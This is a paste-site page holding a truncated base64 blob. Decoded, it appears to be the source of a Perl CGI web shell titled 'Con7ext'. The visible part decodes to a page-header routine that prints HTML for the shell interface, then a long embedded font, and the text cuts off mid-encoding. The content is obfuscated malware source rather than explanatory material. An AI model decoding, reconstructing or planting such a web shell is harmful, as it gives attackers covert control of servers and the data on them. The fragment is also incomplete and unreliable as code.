CAgfQ0KfQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQokRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOw0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+Q29uN2V4dDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCjxzdHlsZT4NCkBmb250LWZhY2Ugew0KICAgIGZvbnQtZmFtaWx5OiAndWJ1bnR1X21vbm9yZWd1bGFyJzsNCnNyYzogdXJsKGRhdGE6YXBwbGljYXRpb24veC1mb250LXdvZmY7Y2hhcnNldD11dGYtODtiYXNlNjQsZDA5R1JnQUJBQUFBQUdXSUFCTUFBQUFBdkRBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUJHUmxSTkFBQUJxQUFBQUJ3QUFBQWNaTytIZEVkRVJVWUFBQUhFQUFBQUtRQUFBQ3dDSXdFSlIxQlBVd0FBQWZBQUFBQXlBQUFBUURYT1RyQkhVMVZDQUFBQ0pBQUFBVmtBQUFJR2xOdkpxRTlUTHpJQUFBT0FBQUFBWFFBQUFHQ1pWUVRaWTIxaGNBQUFBK0FBQUFHT0FBQUI2Z0NMakJaamRuUWdBQUFGY0FBQUFFb0FBQUJLRTBrT2MyWndaMjBBQUFXOEFBQUJzUUFBQW1WVHRDK25aMkZ6Y0FBQUIzQUFBQUFJQUFBQUNBQUFBQkJuYkhsbUFBQUhlQUFBVm1FQUFLVzBJcnQyUEdobFlXUUFBRjNjQUFBQU1BQUFBRFlBeTJMRGFHaGxZUUFBWGd3QUFBQWNBQUFBSkFxbUJQOW9iWFI0QUFCZUtBQUFBV2dBQUFPaWhtRnhDR3h2WTJFQUFGK1FBQUFCeUFBQUFkUU9VVGFRYldGNGNBQUFZVmdBQUFBZ0FBQUFJQUlHQWhWdVlXMWxBQUJoZUFBQUFYc0FBQVBPWWxlS3JYQnZjM1FBQUdMMEFBQUI0Z0FBQXRRc0JxVU1jSEpsY0FBQVpOZ0FBQUNuQUFBQkJxUVR2RzUzWldKbUFBQmxnQUFBQUFZQUFBQUdkVnRTcGdBQUFBRUFBQUFBekQyaXp3QUFBQURKNWI3TEFBQUFBTTdNSmRsNDJtTmdaR0JnNEFOaUZRWVFZR0pnQnVJNkJrYUdlb1pHSUt1SjRRV1F6UUtXWVFBQU5tSURMUUFBQUhqYVkyQmtZR0RnWXJCaHNHTmdUcTRzeW1FUVNTOUt6V2FReTBrc3lXUFFZR0FCeWpMOC93OGtzTEdBQUFCM2t3djdBQUI0Mm5XUngwcERRUmlGditzMUxrSndGUXZpSW9nbDloaGpMOFFTQkdNTVhGMjVFR0tNTGt3aTNCaEJpU3Q3N3cwN1BvVzRzN3lJTDZKL2hvdmdRb1k1ZjVselpzN01vQUYySHZsQ2p5NlpjWnl6Wm15TzluaGtJY2t3aGVqOVE0YUx3bEJ3VUhETTZCZUU3Mjl5UmFlUkl6R2IvZTJVWWV1YkNMandEaGpqZ3FId2lBdS9FUTRKamh0QjZTaSt6ZUxyV2VVZmZiYlNwY3JtdHNpTUdjVVZqYVJpdUpQcGhFbkR2RG1keEpkS2VieDBLbGFPWW12V0RpalVmbGRzT0hCU1NqbDFxcXZodG1LckZmM2txVGhxMVZPaWM0Z3lRNXBGcVhVSzVOWkYwclhMVExDaWZBWVkrNGVuUzE0c005L3lvcXYxak9WcFdWeFhVRW1WK0tpbWhscnhWVThEalhob2tyZHB4a2VMZUd1am5RN2hkdEZORDcyc3NzWTZHMnl5eFRZNzdMTEhQZ2NjY3NReEo1eHl4amtYWEhMRk5UZmNjc2M5RC9LM1QzenlybDR6d0tSNGVPYUZFbDU1ay9NK1pIVDhBR25WU3FFQUFBQjQybU5nWm43Qk9JR0JsWUdGZFJhck1RTURvenlFWnI3SWtNYkV3TURBeE0zS3ljekd4TXpFOG9DQjZYOEFnMEkwQXhTNE9QbzZNamd3OFA1bVlrdjdsOGJBd0xhRXFVK0JnV0YrR0NOUTl6YVdMMEFsQ2d4TUFMMzZENzRBQUFCNDJtTmdZR0JtZ0dBWkJrWUdFSGdDNURHQytTd01KNEMwSG9NQ2tNVUhaUEV5eURMVU1meG5ER2FzWURyR2RFZUJTMEZFUVVwQlRrRkpRVTFCWDhGS0lWNWhqYUtTNnAvZlRQLy9nMDBDcVZkZ1dNQVlCRlhQb0NDZ0lLRWdBMVZ2Q1ZmUENGVFAvUC9yLzJmL24vdy8vTC93dis4L2hyK3ZINXg0Y1BqQmdRZjdIK3g1c1BQQnhnY3JIclE4c0xoLytOWXIxbWRRZDVJQUdOa2dYZ1N6bVlBRUU1b0NvQ1FMS3hzN0J5Y1hOdzh2SDcrQW9KQ3dpS2lZdUlTa2xMU01ySnk4Z3FLU3NvcXFtcnFHcHBhMmpxNmV2b0doa2JHSnFabTVoYVdWdFkydG5iMkRvNU96aTZ1YnU0ZW5sN2VQcjU5L1FHQlFjRWhvV0hoRVpGUjBUR3hjZkVKaUVrTjdSMWZQbEpuemx5eGV1bnpaaWxWclZxOWR0Mkg5eGsxYnRtM2R2blBIM2ozNzlqTVVwNlpsM2F0Y1ZKanp0RHlib1hNMlF3a0RRMFlGMkhXNXRRd3JkemVsNUlQWWVYWDNrNXZiWmh3K2N1MzY3VHMzYnU1aU9IU1U0Y25EUjg5Zk1GVGR1c3ZRMnR2UzF6MWg0cVQrYWRNWnBzNmRONGZoMlBFaW9LWnFJQVlBSm9hTXhBQUFBQUFEdGdUMEFKQUFod0NKQUlzQWxnRElBUklBcUFFR0FKa0Fvd0NvQUt3QXNBQzJBSlVBb1FDY0FLNEFkUUN5QUhrQWZBQ1RBS29BalFDZkFLWUFkd0J0QUhBQWZ3QkVCUkVBQUhqYVhWRzdUbHRCRU4wTkR3T0J4TmdnT2RvVXM1bVF4bnVoQlFuRTFZMWlaRHVGNVFocE4zS1JpM0VCSDBDQlJBM2FyeG1nb2FSSW13WWhGMGg4UWo0aEVqTnJpS0kwT3p1emM4NlpNMHZLa2FwMzZXdlBVK2Nra01MZEJzMDIvVTVJdGJNQTk2VHI2NDJNdE
Add Comment
Please, Sign In to add comment